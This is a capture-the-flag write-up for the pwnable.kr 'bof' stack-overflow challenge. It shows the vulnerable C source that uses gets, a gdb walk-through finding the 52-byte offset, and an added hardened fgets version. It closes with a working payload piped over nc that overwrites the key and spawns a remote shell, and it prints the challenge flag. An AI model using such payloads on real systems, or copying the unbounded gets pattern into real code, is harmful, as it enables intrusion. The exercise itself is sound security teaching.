Toddler's Bottle - bof

  1. 0xdeadbeef is passed to func as the key.
  2. In func:
     1. The user inputs a string, which is saved to the array overflowme[32].
     2. No length check is performed, which means you can input a string much longer than 32 bytes.
     3. If key == 0xcafebabe, you get the flag.

Code:

#include <stdio.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me! (gets has no bound on how much it writes)
    if(key == 0xcafebabe){   // key lives in the caller's frame, above the buffer
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

How to get the flag?

In order to get the flag, we must make the value of key equal to 0xcafebabe. Since no length check is performed, we can craft a long string that overflows the buffer and overwrites 0xdeadbeef. The last 4 bytes of the string are set to 0xcafebabe (written in little-endian byte order).

AAAAAAAAA........AAAAAAA....0xcafebabe
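As an added defender-side example (not part of the original writeup or the pwnable.kr binary), here is a hardened counterpart of func() that reads with fgets instead of gets, drains any excess so it cannot spill into the next read, and reports truncated input; fed the writeup's 52-byte padding plus key bytes (constructed here as SAMPLE_PAYLOAD), the bounded read never reaches the key slot, so the check passes only when the caller really supplied 0xcafebabe.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen */
#include <stdio.h>
#include <string.h>

/* Read one line into buf, never writing past cap bytes; excess is drained so a
 * later read cannot pick it up. Returns bytes dropped (0 = fit), -1 on EOF. */
long read_line_bounded(FILE *in, char *buf, size_t cap) {
    if (fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {             /* whole line fit */
        buf[len] = '\0';
        return 0;
    }
    long dropped = 0;                   /* too long: drain the rest */
    for (int c; (c = fgetc(in)) != EOF && c != '\n'; )
        dropped++;
    return dropped;
}

/* Hardened counterpart of the challenge's func(): a bounded read cannot reach
 * the caller's key slot, so this is 1 only if the caller passed 0xcafebabe. */
int func_safe(int key, FILE *in) {
    char overflowme[32];
    long dropped = read_line_bounded(in, overflowme, sizeof overflowme);
    if (dropped > 0)
        fprintf(stderr, "input truncated, %ld byte(s) dropped\n", dropped);
    return (unsigned)key == 0xcafebabeu;
}

/* Constructed sample: the writeup's 52 'A's plus the 4 bytes meant for key. */
static const char SAMPLE_PAYLOAD[] =
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbe\xba\xfe\xca\n";

/* func_safe's verdict on the sample for a given key (-1 on stream error). */
int sample_key_check(int key) {
    FILE *in = fmemopen((void *)SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD - 1, "r");
    if (in == NULL) return -1;
    int ok = func_safe(key, in);
    fclose(in);
    return ok;
}

/* Bytes of the sample the bounded read had to discard (31 fit, 25 dropped). */
long sample_excess(void) {
    char buf[32];
    FILE *in = fmemopen((void *)SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD - 1, "r");
    if (in == NULL) return -1;
    long dropped = read_line_bounded(in, buf, sizeof buf);
    fclose(in);
    return dropped;
}
```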

So how long should the string be?

First, download the bof binary from http://pwnable.kr/bin/bof and open it with gdb ./bof.

  1. Set breakpoints:
  2. Run with 'r', then step with 'ni' or 'si' until you need to input something (I input a long string of 33 'A's):
  3. Note that the string is saved at the address in ESP. Check the value of ESP, or use telescope [linecount] (e.g. telescope 25, a peda/pwndbg command) to display the memory content. So the 33 'A' bytes are stored from 0xbffff30c to 0xbffff32b. Note that 0xdeadbeef sits at 0xbffff340. So how long should the string be to overwrite 0xdeadbeef? 0xbffff340 - 0xbffff30c = 0x34, which is 52 bytes in decimal: the 32-byte buffer plus everything the compiler placed between it and the argument slot in the caller's frame.

Solution (the trailing cat - keeps stdin open so that commands such as cat flag can be typed into the spawned shell):

root@kali:~$ (python -c "print 'A'*52+'\xbe\xba\xfe\xca'";cat - ) | nc pwnable.kr 9000
cat flag
daddy, I just pwned a buFFer :)
